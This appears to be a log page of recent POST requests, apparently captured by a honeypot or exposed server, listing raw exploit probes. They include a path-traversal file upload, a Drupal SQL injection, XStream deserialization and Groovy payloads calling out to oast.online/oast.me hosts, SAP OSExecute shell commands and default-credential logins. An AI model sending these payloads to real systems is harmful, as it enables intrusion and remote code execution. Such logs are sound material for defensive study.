Recent POST requests

At 2026-06-21T17:27:50:

Content Type	multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa
Headers
Body	--a54906fe12c504cb01ca836d062f82fa Content-Disposition: form-data; name="field_id" 3 --a54906fe12c504cb01ca836d062f82fa Content-Disposition: form-data; name="form_id" 1 --a54906fe12c504cb01ca836d062f82fa Content-Disposition: form-data; name="gform_unique_id" ../../../ --a54906fe12c504cb01ca836d062f82fa Content-Disposition: form-data; name="name" abcacab.phtml --a54906fe12c504cb01ca836d062f82fa Content-Disposition: form-data; name="file"; filename="abcacab.jpg" Content-Type: text/html 3FRwmR6XsN4RPYcsSPwH60E6F4R --a54906fe12c504cb01ca836d062f82fa--

At 2026-06-21T16:33:59:

Content Type	None
Headers
Body	pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(999999999)),1)%23]=bob&name[0]=a

At 2026-06-21T16:23:24:

Content Type	application/xml
Headers
Body	<sorted-set> <string>foo</string> <contact class='dynamic-proxy'> <interface>java.lang.Comparable</interface> <handler class='java.beans.EventHandler'> <target class='java.lang.ProcessBuilder'> <command> <string>curl</string> <string>http://d8rv6avqbipfbp8erii04gh8benzttoib.oast.online</string> </command> </target> <action>start</action> </handler> </contact> </sorted-set>

At 2026-06-09T10:11:48:

Content Type	application/x-www-form-urlencoded
Headers
Body	webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D

At 2026-06-09T10:10:51:

Content Type	application/x-www-form-urlencoded
Headers
Body	login=admin&password=admin

At 2026-06-09T10:10:50:

Content Type	application/x-www-form-urlencoded
Headers
Body	login=admin&password=sonar

At 2026-06-09T10:10:41:

Content Type	application/x-www-form-urlencoded
Headers
Body	login=sonar&password=admin

At 2026-06-09T10:10:41:

Content Type	application/x-www-form-urlencoded
Headers
Body	login=sonar&password=sonar

At 2026-06-09T10:10:35:

Content Type	text/xml; charset=UTF-8
Headers
Body	<?xml version="1.0" encoding="utf-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:OSExecute xmlns:ns1="urn:SAPControl"> <command>/bin/sh -c id</command> <async>0</async> </ns1:OSExecute> </SOAP-ENV:Body> </SOAP-ENV:Envelope>

At 2026-06-09T10:10:35:

Content Type	text/xml; charset=UTF-8
Headers
Body	<?xml version="1.0" encoding="utf-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:OSExecute xmlns:ns1="urn:SAPControl"> <command>/bin/sh -c id</command> <async>0</async> </ns1:OSExecute> </SOAP-ENV:Body> </SOAP-ENV:Envelope>

At 2026-06-09T10:10:32:

Content Type	text/xml; charset=UTF-8
Headers
Body	<?xml version="1.0" encoding="utf-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"> <SOAP-ENV:Header> <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/"> <enableSession>true</enableSession> </sapsess:Session> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:OSExecute xmlns:ns1="urn:SAPControl"> <command>/bin/sh -c id</command> <async>0</async> </ns1:OSExecute> </SOAP-ENV:Body> </SOAP-ENV:Envelope>

At 2026-06-09T10:09:21:

Content Type	None
Headers
Body	{"ephemeral":true,"disabled":false,"name":"nzlyl","schedule":"@every 1s","executor":"shell","executor_config":{"command":"nslookup nzlyl.d8jub66brn47966a20n0tti9ryjuph58e.oast.me","cwd":"/tmp/","env":"ENV_VAR=va1,ANOTHER_ENV_VAR=var2","shell":"true","timeout":"10s"},"retries":null}

At 2026-06-09T10:07:59:

Content Type	application/x-www-form-urlencoded
Headers
Body	username=admin&password=&redirectPath=

At 2026-06-09T10:07:48:

Content Type	application/json
Headers
Body	{"jsonrpc":"2.0","method":"txpool_content","params":[],"id":1}

At 2026-06-09T10:07:47:

Content Type	application/x-www-form-urlencoded
Headers
Body	groovyProgram=import+groovy.lang.GroovyShell%3B%0A%0AString+expression+%3D+%22'nslookup+d8jub66brn47966a20n0c31ictu4hk5qt.oast.me'.execute()%22%3B%0AGroovyShell+gs+%3D+new+GroovyShell()%3B%0Ags.evaluate(expression)%3B

At 2026-06-09T10:07:39:

Content Type	multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3
Headers
Body	--8ce4b16b22b58894aa86c421e8759df3 Content-Disposition: form-data; name="jarfile";filename="poc.jar" Content-Type:application/octet-stream 3EtYxBVwDapu98dPJH1yIFKVIkB --8ce4b16b22b58894aa86c421e8759df3--

At 2026-06-09T10:07:17:

At 2026-06-09T10:06:20:

Content Type	application/json
Headers
Body	{"jsonrpc":"2.0","method":"txpool_content","params":[],"id":1}

At 2026-06-09T09:00:14:

Content Type	application/x-www-form-urlencoded
Headers
Body	webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D